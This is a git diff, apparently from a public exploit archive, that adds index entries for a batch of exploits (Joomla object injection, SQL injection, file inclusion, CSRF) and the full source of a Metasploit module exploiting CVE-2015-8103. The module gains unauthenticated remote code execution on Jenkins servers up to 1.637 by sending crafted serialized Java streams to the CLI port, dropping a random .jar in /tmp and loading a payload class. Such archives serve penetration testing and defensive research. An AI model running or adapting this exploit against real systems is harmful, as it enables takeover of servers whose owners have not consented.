pythonmaster41
diff --git a/‎files.csv‎
Lines changed: 12 additions & 0 deletions b/‎files.csv‎
Lines changed: 12 additions & 0 deletions
diff --git a/‎platforms/java/remote/38983.rb‎
Lines changed: 263 additions & 0 deletions b/‎platforms/java/remote/38983.rb‎
Lines changed: 263 additions & 0 deletions
@@ -35232,3 +35232,15 @@ id,file,description,date,author,platform,type,port
 38974,platforms/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution",2015-12-14,metasploit,multiple,remote,0
 38975,platforms/php/webapps/38975.txt,"Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion",2015-12-14,"High-Tech Bridge SA",php,webapps,80
 38976,platforms/php/webapps/38976.txt,"Bitrix bitrix.xscan Module 1.0.3 - Directory Traversal",2015-12-14,"High-Tech Bridge SA",php,webapps,80
+38977,platforms/php/remote/38977.py,"Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution",2015-12-15,Sec-1,php,remote,0
+38978,platforms/windows/dos/38978.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - Invalid Pointer Dereference",2015-12-15,"Ptrace Security",windows,dos,11460
+38979,platforms/windows/dos/38979.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_SetConfFileChunk Stack Buffer Overflow Vulnerability",2015-12-15,"Ptrace Security",windows,dos,11460
+38980,platforms/windows/dos/38980.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_GetConfFileChunk Stack Buffer Overflow Vulnerability",2015-12-15,"Ptrace Security",windows,dos,11460
+38981,platforms/php/webapps/38981.txt,"Ovidentia absences Module 2.64 - Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80
+38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability",2015-12-15,metasploit,jsp,remote,8020
+38983,platforms/java/remote/38983.rb,"Jenkins CLI RMI Java Deserialization Vulnerability",2015-12-15,metasploit,java,remote,8080
+38985,platforms/php/webapps/38985.txt,"Dredge School Administration System /DSM/loader.php Id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38986,platforms/php/webapps/38986.txt,"Dredge School Administration System /DSM/loader.php Account Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38987,platforms/php/webapps/38987.html,"Dredge School Administration System /DSM/loader.php Admin Account Manipulation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38988,platforms/php/webapps/38988.txt,"Dredge School Administration System /DSM/Backup/processbackup.php Database Backup Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38989,platforms/php/webapps/38989.txt,"Ovidentia bulletindoc Module 2.9 - Multiple Remote File Inclusion Vulnerabilities",2015-12-15,bd0rk,php,webapps,80
@@ -0,0 +1,263 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Jenkins CLI RMI Java Deserialization Vulnerability',
+      'Description'    => %q{
+        This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on
+        the Jenkins master, which allows remote arbitrary code execution. Authentication is not
+        required to exploit this vulnerability.
+      },
+      'Author'         =>
+          [
+            'Christopher Frohoff', # Vulnerability discovery
+            'Steve Breen',         # Public Exploit
+            'Dev Mohanty',         # Metasploit module
+            'Louis Sato',          # Metasploit
+            'William Vu',          # Metasploit
+            'juan vazquez',        # Metasploit
+            'Wei Chen'             # Metasploit
+          ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+          [
+            ['CVE', '2015-8103'],
+            ['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'],
+            ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
+            ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
+            ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11']
+          ],
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Targets'        =>
+        [
+          [ 'Jenkins 1.637', {} ]
+        ],
+      'DisclosureDate' => 'Nov 18 2015',
+      'DefaultTarget' => 0))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']),
+      OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
+      Opt::RPORT('8080')
+    ], self.class)
+  end
+
+  def exploit
+    unless vulnerable?
+      fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
+    end
+    invoke_remote_method(set_payload)
+    invoke_remote_method(class_load_payload)
+  end
+
+
+  # This is from the HttpClient mixin. But since this module isn't actually exploiting
+  # HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion &
+  # conflicts). We do need #target_uri and normlaize_uri to properly normalize the path though.
+
+  def target_uri
+    begin
+      # In case TARGETURI is empty, at least we default to '/'
+      u = datastore['TARGETURI']
+      u = "/" if u.nil? or u.empty?
+      URI(u)
+    rescue ::URI::InvalidURIError
+      print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
+      raise Msf::OptionValidateError.new(['TARGETURI'])
+    end
+  end
+
+  def normalize_uri(*strs)
+    new_str = strs * "/"
+
+    new_str = new_str.gsub!("//", "/") while new_str.index("//")
+
+    # Makes sure there's a starting slash
+    unless new_str[0,1] == '/'
+      new_str = '/' + new_str
+    end
+
+    new_str
+  end
+
+  def check
+    result = Exploit::CheckCode::Safe
+
+    begin
+      if vulnerable?
+        result = Exploit::CheckCode::Vulnerable
+      end
+    rescue Msf::Exploit::Failed => e
+      vprint_error(e.message)
+      return Exploit::CheckCode::Unknown
+    end
+
+    result
+  end
+
+  def vulnerable?
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'The connection timed out.')
+    end
+
+    http_headers = res.headers
+
+    unless http_headers['X-Jenkins-CLI-Port']
+      vprint_error('The server does not have the CLI port that is needed for exploitation.')
+      return false
+    end
+
+    if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637
+      @jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i
+      return true
+    end
+
+    false
+  end
+
+  # Connects to the server, creates a request, sends the request,
+  # reads the response
+  #
+  # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.
+  #
+  def send_request_cgi(opts={}, timeout = 20)
+    if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
+      actual_timeout = datastore['HttpClientTimeout']
+    else
+      actual_timeout =  opts[:timeout] || timeout
+    end
+
+    begin
+      c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])
+      c.connect
+      r = c.request_cgi(opts)
+      c.send_recv(r, actual_timeout)
+    rescue ::Errno::EPIPE, ::Timeout::Error
+      nil
+    end
+  end
+
+  def invoke_remote_method(serialized_java_stream)
+    begin
+      socket = connect(true, {'RPORT' => @jenkins_cli_port})
+
+      print_status 'Sending headers...'
+      socket.put(read_bin_file('serialized_jenkins_header'))
+
+      vprint_status(socket.recv(1024))
+      vprint_status(socket.recv(1024))
+
+      encoded_payload0 = read_bin_file('serialized_payload_header')
+      encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream)
+      encoded_payload2 = read_bin_file('serialized_payload_footer')
+
+      encoded_payload = "#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}"
+      print_status "Sending payload length: #{encoded_payload.length}"
+      socket.put(encoded_payload)
+    ensure
+      disconnect(socket)
+    end
+
+  end
+
+  def print_status(msg='')
+    super("#{rhost}:#{rport} - #{msg}")
+  end
+
+  #
+  # Serialized stream generated with:
+  # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java
+  #
+  def set_payload
+    stream = Rex::Java::Serialization::Model::Stream.new
+
+    handle = File.new(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", 'serialized_file_writer' ), 'rb')
+    decoded = stream.decode(handle)
+    handle.close
+
+    inject_payload_into_stream(decoded).encode
+  end
+
+  #
+  # Serialized stream generated with:
+  # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java
+  #
+  def class_load_payload
+    stream = Rex::Java::Serialization::Model::Stream.new
+    handle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb')
+    decoded = stream.decode(handle)
+    handle.close
+    inject_class_loader_into_stream(decoded).encode
+  end
+
+  def inject_class_loader_into_stream(decoded)
+    file_name_utf8 = get_array_chain(decoded)
+                         .values[2]
+                         .class_data[0]
+                         .values[1]
+                         .values[0]
+                         .values[0]
+                         .class_data[3]
+    file_name_utf8.contents = get_random_file_name
+    file_name_utf8.length = file_name_utf8.contents.length
+    class_name_utf8 = get_array_chain(decoded)
+                          .values[4]
+                          .class_data[0]
+                          .values[0]
+    class_name_utf8.contents = 'metasploit.Payload'
+    class_name_utf8.length = class_name_utf8.contents.length
+    decoded
+  end
+
+  def get_random_file_name
+    @random_file_name ||= "#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], "#{rand_text_alpha(4 + rand(4))}.jar")}"
+  end
+
+  def inject_payload_into_stream(decoded)
+    byte_array = get_array_chain(decoded)
+                     .values[2]
+                     .class_data
+                     .last
+    byte_array.values = payload.encoded.bytes
+    file_name_utf8 = decoded.references[44].class_data[0]
+    rnd_fname = get_random_file_name
+    register_file_for_cleanup(rnd_fname)
+    file_name_utf8.contents = rnd_fname
+    file_name_utf8.length = file_name_utf8.contents.length
+    decoded
+  end
+
+  def get_array_chain(decoded)
+    object = decoded.contents[0]
+    lazy_map = object.class_data[1].class_data[0]
+    chained_transformer = lazy_map.class_data[0]
+    chained_transformer.class_data[0]
+  end
+
+  def read_bin_file(bin_file_path)
+    data = ''
+
+    File.open(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", bin_file_path ), 'rb') do |f|
+      data = f.read
+    end
+
+    data
+  end
+
+end